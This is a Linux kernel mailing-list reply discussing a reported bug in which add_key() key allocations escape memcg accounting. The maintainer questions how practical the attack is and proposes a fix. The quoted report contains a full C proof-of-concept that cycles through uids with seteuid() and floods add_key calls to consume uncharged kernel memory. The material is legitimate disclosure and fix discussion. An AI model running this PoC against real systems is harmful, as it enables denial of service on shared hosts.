Date: Mon, 29 Mar 2021 09:39:42 +0200
From: Michal Hocko
To: 杨昱天
Cc: hannes@cmpxchg.org, vdavydov.dev@gmail.com, cgroups@vger.kernel.org,
	linux-mm@kvack.org, shenwenbosmile@gmail.com, David Howells,
	Jarkko Sakkinen, James Morris, "Serge E. Hallyn",
	keyrings@vger.kernel.org, linux-security-module@vger.kernel.org
Subject: Re: add_key() syscall can lead to bypassing memcg limits
References: <7d222142.1e89e.17876ab335a.Coremail.ytyang@zju.edu.cn>
In-Reply-To: <7d222142.1e89e.17876ab335a.Coremail.ytyang@zju.edu.cn>

Cc keyctl maintainers

On Sun 28-03-21 10:30:34, 杨昱天 wrote:
> Hi, our team has found a bug in key_alloc() on Linux kernel v5.10.19, which
> leads to bypassing memcg limits.
> The bug is caused by the code snippets listed below:
>
> /*--------------- key.c --------------------*/
> ...
> 276	/* allocate and initialise the key and its description */
> 277	key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
> 278	if (!key)
> 279		goto no_memory_2;
> ...
> /*---------------- end ---------------------*/
>
> /*------------- keyctl.c -------------------*/
> ...
> 95	if (_description) {
> 96		description = strndup_user(_description, KEY_MAX_DESC_SIZE);
> 97		if (IS_ERR(description)) {
> ...
> /*--------------- end ---------------------*/
>
> Each user can allocate ~20KB of uncharged memory by calling the add_key syscall to trigger the listed code.
> Code at line 277 in the first snippet allocates a new struct key object that is not charged by memcg, as no accounting flag is passed to either the
> allocation site here or the key_jar's creating site. At line 96 in the second snippet, we found that the memory used by the description of a key,
> which has a maximum size of 4096 bytes, is also not charged. A user can allocate multiple keys and consume more uncharged memory.
> The upper limit of key memory's size is set to 20,000 bytes by default for each user.
>
> The bug can cause severe memcg limit bypassing if a process can change its uid and bypass the above limit. For example, a user may own root privilege
> in its user namespace and leverage the seteuid() syscall to continuously change its uid.
> Our evaluation on QEMU v5.1.0 + cgroup v2 shows that, under this assumption, we could consume ~2.2G memory by allocating keys from 100,000 different uids, while the memory charged by memcg is ~215MB.

Can the user/attacker create all those different uids? Or what would be
a typical scenario where this is a threat? In other words, is this a
practical attack vector?

If yes then the mitigation would be quite easy for the key_jar (just add
__GFP_ACCOUNT).
I am not aware of a strndup_user alternative with kmemcg accounting
enabled, so one would have to be added.

>
> The PoC code is listed below:
>
> /*--------------- PoC --------------------*/
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <time.h>
> #include <unistd.h>
> #include <sys/syscall.h>
> #include <linux/keyctl.h>
>
> char desc[4000];
> void alloc_key_user(int id) {
>     int i = 0, times = -1;
>     __s32 serial = 0;
>     int res_uid = seteuid(id);
>     if (res_uid == 0)
>         printf("uid allocation success on id %d!\n", id);
>     else {
>         printf("uid allocation failed on id %d!\n", id);
>         return;
>     }
>     srand(time(0));
>     /* keep adding keys until add_key fails for this uid */
>     while (serial != -1) {
>         ++times;
>         /* random non-zero bytes so each description is distinct */
>         for (i = 0; i < 3900; ++i)
>             desc[i] = rand()%255 + 1;
>         desc[i] = '\0';
>         serial = syscall(__NR_add_key, "user", desc, "payload",
>                          strlen("payload"), KEY_SPEC_SESSION_KEYRING);
>     }
>     printf("allocation happened %d times.\n", times);
>     seteuid(0);
> }
>
> int main() {
>     int loop_times = 0;
>     int start_uid = 0;
>     scanf("%d %d", &start_uid, &loop_times);
>     for (int i = 0; i < loop_times; ++i) {
>         alloc_key_user(i+start_uid);
>     }
>     return 0;
> }
>
> /*-------------PoC end ---------------------*/
>
> Thanks!
>
> Best regards,
> Yutian Yang

-- 
Michal Hocko
SUSE Labs